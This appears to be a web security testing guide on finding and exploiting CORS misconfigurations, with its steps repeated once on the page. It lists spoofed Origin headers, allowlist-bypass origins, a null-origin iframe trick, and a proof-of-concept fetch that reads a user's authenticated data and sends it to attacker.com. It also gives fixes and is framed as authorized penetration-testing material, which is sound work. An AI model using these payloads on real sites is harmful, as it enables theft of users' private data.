Home GuidesCORS Misconfiguration Testing Guide

CORS Misconfiguration Testing Guide

Learn how to find and exploit CORS misconfigurations — reflected origins, null origin, weak regex, and credentialed cross-origin reads — with a step-by-step methodology and ready-to-use test requests.

Intermediate

6 steps17 payload examples~60 min

Authorized testing only. Only use these techniques on systems you have explicit permission to test.

Map cross-origin endpoints and current CORS headers

Identify API endpoints that return sensitive data and inspect their CORS response headers. Send a request with an Origin header and look at Access-Control-Allow-Origin (ACAO) and Access-Control-Allow-Credentials (ACAC) in the response.

Example payloads

Origin: https://attacker.com

curl -s -I -H "Origin: https://attacker.com" https://target.com/api/me

Look for: Access-Control-Allow-Origin: https://attacker.com + Access-Control-Allow-Credentials: true

Test for arbitrary origin reflection

The most common flaw: the server reflects whatever Origin you send into ACAO. Combined with ACAC: true, any site can read authenticated responses. Send an unrelated origin and check whether it is echoed back.

Example payloads

Origin: https://evil.example

Origin: https://attacker.com

Vulnerable if response has: Access-Control-Allow-Origin: <your origin>

Test the null origin

Sandboxed iframes, redirects, and data: URLs send Origin: null. Many allowlists include null, which an attacker can force from a sandboxed iframe. Check whether null is trusted.

Example payloads

Origin: null

<iframe sandbox="allow-scripts allow-forms" srcdoc="<script>/* fetch target */</script>">

Vulnerable if response has: Access-Control-Allow-Origin: null

Probe weak allowlist regex and subdomain trust

Allowlists built with sloppy string matching can be tricked by prefix/suffix tricks or attacker-controlled subdomains. Test origins that contain the trusted domain as a substring.

Example payloads

Origin: https://target.com.attacker.com

Origin: https://attacker-target.com

Origin: https://target.com.evil.net

Origin: https://evil.target.com (if subdomains are trusted and one is takeover-able)

Confirm credentialed cross-origin read

A reflected origin only matters if credentials are allowed. Build a proof-of-concept page that performs a credentialed fetch and exfiltrates the response. Without ACAC: true, the browser blocks reading the body even if ACAO reflects.

Example payloads

fetch('https://target.com/api/me', { credentials: 'include' }).then(r => r.text()).then(d => fetch('https://attacker.com/log?d=' + encodeURIComponent(d)))

Confirm the response body is readable cross-origin (not just sent).

Assess impact and document

Record the vulnerable endpoint, the accepted origin pattern, whether credentials are reflected, and the data exposed. Recommend an explicit origin allowlist (no reflection, no null, exact-match), and decoupling ACAC from untrusted origins.

Example payloads

Document: endpoint, ACAO behavior, ACAC value, data exposed, PoC URL.

Fix: exact-match allowlist; never reflect Origin; never combine wildcard/null with credentials.

Related Resources

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

$loading...

Map cross-origin endpoints and current CORS headers

Example payloads

Origin: https://attacker.com

curl -s -I -H "Origin: https://attacker.com" https://target.com/api/me

Look for: Access-Control-Allow-Origin: https://attacker.com + Access-Control-Allow-Credentials: true

Test for arbitrary origin reflection

Example payloads

Origin: https://evil.example

Origin: https://attacker.com

Vulnerable if response has: Access-Control-Allow-Origin: <your origin>

Test the null origin

Sandboxed iframes, redirects, and data: URLs send Origin: null. Many allowlists include null, which an attacker can force from a sandboxed iframe. Check whether null is trusted.

Example payloads

Origin: null

<iframe sandbox="allow-scripts allow-forms" srcdoc="<script>/* fetch target */</script>">

Vulnerable if response has: Access-Control-Allow-Origin: null

Probe weak allowlist regex and subdomain trust

Allowlists built with sloppy string matching can be tricked by prefix/suffix tricks or attacker-controlled subdomains. Test origins that contain the trusted domain as a substring.

Example payloads

Origin: https://target.com.attacker.com

Origin: https://attacker-target.com

Origin: https://target.com.evil.net

Origin: https://evil.target.com (if subdomains are trusted and one is takeover-able)

Confirm credentialed cross-origin read

Example payloads

fetch('https://target.com/api/me', { credentials: 'include' }).then(r => r.text()).then(d => fetch('https://attacker.com/log?d=' + encodeURIComponent(d)))

Confirm the response body is readable cross-origin (not just sent).

Assess impact and document

Example payloads

Document: endpoint, ACAO behavior, ACAC value, data exposed, PoC URL.

Fix: exact-match allowlist; never reflect Origin; never combine wildcard/null with credentials.